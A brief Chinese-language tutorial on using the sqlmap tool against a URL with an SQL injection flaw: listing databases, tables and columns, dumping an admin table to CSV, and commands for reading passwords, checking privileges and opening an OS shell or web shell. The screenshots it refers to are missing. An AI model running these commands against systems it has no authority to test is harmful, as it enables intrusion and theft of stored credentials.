Sqlmap使用方法

SQLmap使用方法

 

1.查看数据库：pythonsqlmap -u存在注入的URL地址 --dbs

以下是结果：

发现2个库。

2.接下来查看表名：

用法：python sqlmap -u 存在注入的URL地址 -D 数据库名（如图的xkb）--tables

3.查看字段：

 

图中是查看数据库xkb中cms_admin表中字段。结果如下：

 

4.爆字段内容

 

爆admin_name的内容。

 

5.脱裤

-C 字段，字段之间逗号分开。--threads线程数  start,stop就是要脱好多条记录。

最后结果会以CSV格式保存。

 

一些常用命令：

python sqlmap.py -u 注入地址 --is-dba  判断当前用户是不是DBA

python sqlmap.py -u 注入地址 --users    查看当前用户

python sqlmap.py -u 注入地址 --passwords查看密码

python sqlmap.py -u 注入地址 --privileges查看权限

python sqlmap.py -u 注入地址 --os-shell  写web shell